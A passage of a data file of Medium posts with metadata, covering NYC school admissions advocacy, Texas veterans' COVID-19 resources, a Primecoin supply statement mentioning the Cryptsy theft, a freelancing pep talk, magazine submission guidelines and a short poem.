“More diverse schools on paper, which might be the result of these admissions changes, may not equal more diverse classrooms if de-tracking is not a focus. Unless each school has a diversity equity and inclusion committee of some kind, there will be no collaborative body working to bring these ideas alive in the school. Parents might have new opportunities to apply to schools that might be a great match for their children or adolescents but they might not get the support they need to learn about these schools.” — Naomi Peña, President of Community Education Council 1, member of PRESS NYC
“School communities often make up for the lack of vision and planning in plans like the ones being unveiled today, but we want a whole school system that creates the conditions for student centered, humanity driven anti racist practices in every classroom, across all grades. What we often see when seemingly revolutionary policy is handed down is how privileged swaths of parents and eager to please administrators are able to find loopholes in the language and practice of policy that continues to uphold the status quo. We won’t allow for this to be heralded as a success when the SHSAT is still being administered and G&T remains in tact despite the pandemic proving once again that New York City’s children remain separate and unequal.” — Tajh Sutton, President Community Education Council 14, member of PRESS NYC
“The pandemic is forcing changes that de Blasio should have made on day 1. Now that they are beginning to be made, will there be the needed social emotional supports, like advisories, once they are in these schools? Will there be professional development in differentiation? Will they make sure all parents can access virtual tours in their languages?” — Liz Rosenberg, member of PRESS NYC, District 15 parent.
“Standardized tests, including the test for the G&T and SHSAT, are only a measure of access and privilege. It perpetuates segregation and a caste system in our schools. It would be irresponsible to just lift screens without putting in place priority measures for marginalized and minoritized students. These policies need to be centered on racial justice, not just because of COVID19, but because our students deserve integrated, fully funded, equitable schools.” — Kaliris Y. Salas-Ramirez, PhD, president of Community Education Council 4, member of PRESS NYC
Eliminating Middle School Admissions Screens
PRESS NYC applauds the NYC Department of Education for the long-overdue elimination of screens for middle school admission for the current cycle, and we advocate for making this policy change permanent. This is a first step toward a more equitable middle school admissions process. It has always been unjustifiable to base admissions for ten-year-olds on criteria like grades, test scores, or attendance that are overdetermined by factors outside a child’s control, and given the impact of COVID-19, using such screens would be unconscionable.
We know that historically marginalized students have suffered most during the pandemic. Many have chosen fully remote learning due to health concerns. Too many still lack devices and reliable internet connections 9 months into pandemic schooling. Over a hundred thousand students are living in temporary housing. Many children live in fear of their caregivers getting sick or losing financial stability, and many have already experienced these realities. The DOE is on the right side of history in offering historically marginalized students equitable access to middle schools of their choice.
However, if this policy changes admissions only, it will fail. If the DOE is committed to creating diverse and integrated schools, they must enact an admissions process aligned with the process in District 15: every middle school should have a student population that reflects its district. We urge the DOE to implement and improve upon the District 15 process citywide, using the district averages for students living in poverty, with an eventual eye to adjusting district lines to ensure equity citywide.
Removing District Priority in High School Admissions
We applaud the DOE for removing geographic priority, as recommended by the School Diversity Advisory Group. For too long, district priority in admissions has enabled opportunity hoarding and has fueled school segregation.
However, simply removing geographic priorities, especially D2, will not automatically result in equitable access for historically marginalized students, nor will it ensure culturally responsive or sustaining learning environments for all students. Although the removal of screens creates opportunities for increased access, especially for low- income and students of color, it does not guarantee integration. In order to realize our vision of equitable, integrated, culturally responsive and sustaining schools, we must interrupt systemic, wide-ranging patterns and implement mechanisms (building on Ed-Opt) that intentionally promote diversity and anti-racism, including the “5 R’s of Real Integration” developed by IntegrateNYC.
Removing this single geographic screen is an important first step, but expecting schools to desegregate themselves based on access alone has never proven effective. This must be accompanied by a commitment by the DOE to facilitate active outreach to all middle schools in order to ensure the high school applicant pool reflects the diversity of the city. And to make this desegregation effort sustainable, it must be accompanied by a commitment to create a culturally competent and representative school environment.
We are frustrated that the DOE has missed an opportunity for truly transformative change by failing to remove all academic screening for high schools, even as a temporary measure. The lack of valid metrics during the pandemic, when already-existing inequities were magnified, highlights the baselessness of screening policies in general. DOE’s own analysis from spring 2020 shows that 1 in 6 seventh graders perform at least one level worse on 6th grade tests. More disconcerting was their analysis showing both 4th graders and 7th graders perform worse on marking period grades than on final grades. Given these takeaways, we recommend removing academic screening for high schools at least for this admissions cycle.
Gifted & Talented
Research is clear: testing 4-year-olds is not meaningful. Nothing in either science or educational practices justifies this, and it is unsafe to conduct in-person testing during the COVID-19 pandemic. We demand that G&T testing be suspended for this year and that the city move toward a schoolwide enrichment model and Universal Design for Learning immediately.
SHSAT
Although the state controls the single-test admissions criterion for 3 of the city’s specialized high schools, we continue to demand an end to this egregiously inequitable policy, which the city could implement for the remaining SHS’s right away. “The existing system is championed by those who have figured out how to win at this game, with the rules as they are, and who are willing to say or do anything to protect the status quo, no matter the harm to children in all communities. We must reject this, and demand an equitable education for all of our children,” as we wrote in our recent opinion piece.
“We believe that every child — regardless of their parents’ admissions savvy, their test prep regimen, or any other factor — deserves high quality public schools, simply for being a young human to whom we owe our best. Instead of more “specialized” schools, let’s instead make every high school spectacular. Let’s provide the resources for deep, meaningful learning. Let’s do away with scarcity-by-design. All students deserve a public education that cultivates empathy, critical thinking, and cultural competency, and ensures young people become the community-oriented, engaged citizens needed for our democracy to flourish.”
We Continue to Demand:
Equity of Opportunity, Access, & Resources:
Unscreen our schools
Enact police-free schools
Focus resources where there is highest need
5 Rs of Real Integration:
Resources
Race & Enrollment
Relationships
Restorative Justice
Representation
Culturally Responsive & Sustaining, Healing-Centered, Liberatory Schools
Whose Quality Goes Beyond Reputation & Test Scores to Meaningful Criteria:
Teachers & Leadership
School Culture
Resources
Academic Learning
Community & Wellbeing
PRESS NYC media contact: Liz Rosenberg, parents.PRESS.nyc@gmail.com
We are part of a broad coalition of citywide organizations representing stakeholders in public education who recognize the importance of this long-overdue step toward removing discriminatory admissions screens, but will continue to push for resource equity, real integration, and more meaningful definitions of school quality. | https://medium.com/@safeschoolsny/a-missed-opportunity-to-plan-for-equity-a-response-to-high-school-and-middle-school-admissions-8ddfd5d9ea12 | ['Parents For Responsive Equitable Safe Schools'] | 2020-12-24 18:26:53.613000+00:00 | ['Equity', 'New York City', 'Shsat', 'Middle School Admissions', 'High School Admissions'] |
Help during Hardship — Veterans Resource Roundup | Texans are resilient, but we have never faced a challenge like COVID-19 before. Texans from the top of the Panhandle, across the plains of Texas and down to the Rio Grande Valley have been impacted by the invisible enemy. Based on the calls coming into our Veterans Service Call Center and emails, we’ve put together a list of several resources and information sources that can help you and your family during this difficult time.
The Texas Workforce Commission (TWC) wants to make it easier for Veterans and other Texans to file for unemployment. TWC expanded its tele-center hours to seven days a week from 7 a.m. until 7 p.m. There’s more information on www.twc.texas.gov.
Governor Abbott announced April 21 that the state’s powerful online job matching and workforce services system — www.workintexas.com — had almost 500,000 job openings. Jobs can be found by area, skill, or employer.
On April 20, the Texas Veterans Commission (TVC) approved an additional $880,788 in emergency grant funding from the Fund for Veterans Assistance (FVA) to 16 organizations across the state, including the Salvation Army. The funds are to assist with increased service demands because of the Covid-19 outbreak. Information on grant recipients can be found by region.
Veteran-owned small business owners impacted by Covid-19 can get more information about helpful resources from the TVC’s April 10 press release.
On March 31, General Land Office Commissioner and VLB Chairman George P. Bush announced temporary relief to Veterans with VLB loans due to the Covid-19 outbreak. A temporary moratorium was issued on credit reporting, evictions, foreclosures, and late payment penalties as outlined by the VA, FHA, Fannie Mae, and Freddie Mac.
TexVet is the state’s clearinghouse for trusted information, resources, and helpful information for service members, Veterans, and their families. The site has contact information for multiple organizations that provide help such as emergency funds, food, and legal services.
Another website for Veterans needing help or support is the Texas Veterans Portal. It’s an offshoot of the state’s one-stop-shop of online information for Texans — www.texas.gov.
There are more than 200 County Veteran Service Offices in Texas. They provide assistance with local, state, and federal Veterans benefits.
The U.S. Department of Veterans Affairs provides health care and has additional information about Covid-19 on their site. | https://medium.com/texas-veterans-blog/help-during-hardship-veterans-resource-roundup-ef1f709a97a8 | ['Texas Vlb'] | 2020-04-27 19:55:34.992000+00:00 | ['Hardship Assistance', 'Covid 19', 'Veterans', 'Texas'] |
A Statement on the Circulating Supply of Primecoin | Dear Community,
We have heard your requests for a confirmed circulating supply of Primecoin and have been working hard to provide an answer. The complicating factors we faced were: (1) Primecoin’s relative nonuse; and (2) The Cryptsy hack. In the interest of full transparency we are providing both our answer and the work we have done to try to confirm this. We hope you find these satisfactory.
The Short Answer
The short answer is that the CoinMarketCap circulation of ~23 million is correct. While the primecoin.io site displayed a 4 million circulating supply, that website has not been updated in years and had not kept up with current supply.
We also are not able to burn any coins at this time. The Cryptsy exchange held a significant number of Primecoins and was “hacked” a few years ago. By hacked we mean the CEO, Paul Vernon, absconded to China with stolen cryptocurrencies worth millions. We hoped to trace those stolen coins and burn them as they were illicitly acquired. Unfortunately it appears those coins made their way back to circulation as detailed below.
Why Did It Take Us So Long?
For the circulating supply we, of course, saw that the wallet was showing 23 million circulating coins. But to make sure our developers compiled an accurate sampling of the Primecoin blockchain recording the block rewards for every tenth block. Extrapolating this data with an even distribution for the change between each sample we found the results were very similar to the number found on CoinMarketCap and the wallet’s readout. With this triple confirmation we are confident that 23 million is the correct supply. But we wanted to do more.
While finding the supply was easy, we also wanted to find the coins from the Cryptsy hack to determine if any could be burned as illicit proceeds. Tracing coins hacked over two years ago is a difficult endeavor because of how many ways there are to “wash” funds. Our development team spent many hours on a blockchain analysis and started a full forensic examination. Given we expected there would have been legal action we also scoured legal archives, poured through court filings, and read hundreds of pages of records to try to find an answer. Luckily we found that a prior lawsuit against Cryptsy resulted in some useful information. A class action lawsuit against Cryptsy resulted in the appointment of a Receiver/Corporate Monitor whose task was to “determine the nature, location and value of all property interests of Cryptsy, including, but not limited to, cryptocurrencies . . .” and take possession of those assets.
We found several parts of his work helpful. As a result, given the excessive demands on our development team and the quality of the Receiver’s information, we decided it would not be worth duplicating his efforts any further. The court-ordered Receivership employed a “computer forensic team” with direct access to Cryptsy’s servers. This gave them a level of access we would not be able to replicate, the power to legally compel document production. They worked for several months with that power. Our analysis of the relevant portions of their findings are below.
Where Are Cryptsy’s Primecoins Now?
We found the Receiver “successfully accessed Cryptsy’s servers, made a backup of the wallets on them and [completed] the lengthy and tedious process of reviewing hundreds of wallets on the servers . . . [taking] several months.” While we found a list of seized coins Primecoin was not among them. At the end of his receivership the Receiver was legally bound to acquire as much value as possible for the plaintiff class. He did so by liquidating the high value coins on exchanges, which likely did not include Primecoin, and also by selling all remaining altcoins to private buyers. Primecoin did not appear on any of those sell lists. However, and unfortunately, the Receiver found that Vernon was able to sneak out certain funds including Primecoin and move them to foreign exchanges before the team could seize them. Those exchanges did not respond to U.S. court orders.
Given the combination of these two factors: (1) that all secured cryptocurrencies were listed in the Receiver’s reports and sell lists and; (2) that Vernon was able to move at least some of his Primecoin to foreign exchanges we concluded that there were likely no “frozen” or “lost” wallets with Primecoin still in them otherwise the Receiver would have found them. Rather, the fact that at least some were moved to foreign exchanges likely means Cryptsy’s Primecoins were sold and are now back in the circulating supply meaning we are unable to burn those coins. While our development team followed up on these leads, they were unable to find much more beyond what the Receiver’s team uncovered. We have emailed the Receiver but have not heard back. We will update the community if they respond and any promising leads result.
Final Note
Again we want to assure you that we heard your requests for a confirmed circulating supply. We wanted to immediately respond to our many community members who asked but did not feel we should do so until we had exhausted every avenue. We hope you find this statement a satisfactory answer.
Going forward we would like to ask you to trust us. When a team member says that we are working on something and it cannot be rushed please have faith it is because we are exhaustively working on the issue and prefer to release information when we are wholly confident in its accuracy and thoroughness.
Sincerely,
The Bitcoin Prime Team | https://medium.com/btcprime/a-statement-on-the-circulating-supply-of-primecoin-bbaf01b40e32 | ['Prime Team'] | 2018-05-03 15:14:11.395000+00:00 | ['Cryptocurrency', 'Blockchain', 'Hacks', 'Bitcoin'] |
The motivational and talent utilizing world of Freelancing. | I had this storm of emotions inside, but clueless of how to deal with it for so long. I have been cut off from social media since 2012, the thought of it gave me nausea. I came across many unethical stuff which lead me to social distance myself from the digital society.
What changed?
Well my disappearance for sure had no effect, but since then social media has changed and there are platforms which have to offer much more to the potential of the talented and skillful.Blogging and freelancing platforms have elegantly and efficiently carried the world to the next level. They discover talents and skill sets and get you a price for your services.
Evolved Passion.
Getting Paid for your Talent (Freelance).
Over the ages life inside the digital world evolved to such an extent, that talented and skillful are getting even paid for their passion. This for sure is a rise of a more promising future for the upcoming generations. Where you may get just exploited for your work, the same work has been a blessing in the world of freelance. It does have a certain amount of cons but the pros are even more promising. It doesn't matter what skills you have but if you can use it as a service you will get paid for it.
So you can too
If I was able to change and step up for myself in doing what was my passion, and in what I had more thrilling and fun experience so you can too. Discover yourself, decide today, yes it will take time, yes it will require an effort but believe me you'll get to a more high and prosperous place in time. You'll learn more and grow more. So, believe in your dreams and start pursuing them. | https://medium.com/@enggrharis/discovering-your-talent-d0d9de84d628 | ['Haris Ul Haq'] | 2020-05-08 13:23:24.925000+00:00 | ['Motivation', 'Freelance Writing', 'Creativity'] |
How to Submit to Write Like A Girl | What we look for
At Write Like A Girl, our overarching mission statement is to amplify and empower the voices and ideas of women through compelling stories. We love personal stories that resonate with readers, as well as pieces on everything from politics to poetry.
Above all, we write by this saying: “Every time a woman stands up for herself, she stands up for all women.”
Topics we focus on:
Feminism and women
Mental health
Culture, politics, and society
Equality
Life, love, and self
Gender-based violence
Fashion and style
Current events
As a rule of thumb, it’s best to take a look at our latest stories to see if your article would be a good fit. Here are some examples:
Keep in mind that you’re not limited to these topics. As long as it aligns with our themes, we’ll love it. | https://medium.com/write-like-a-girl/how-to-submit-to-write-like-a-girl-de6f3b56daa | ['Zoe Yu'] | 2020-12-08 20:51:37.987000+00:00 | ['Submission', 'Feminism', 'Equality', 'Culture', 'Politics'] |
art of a different kind (rupi kaur wannabe) | i’m a rupi kaur wannabe
guess i’m her but with different traumas
i think she’s really cool
and sorry if my poetry sounds like her
i don’t expect anyone to see these
but i’m finding my style
like i did with my drawings so long ago
this is art of a different kind
and i’m still learning | https://medium.com/@emufriend/art-of-a-different-kind-rupi-kaur-wannabe-a9d6d9005627 | [] | 2020-12-23 22:17:14.318000+00:00 | ['Poetry Writing', 'Poetry', 'Poem A Day', 'Poetry On Medium', 'Poems On Medium'] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.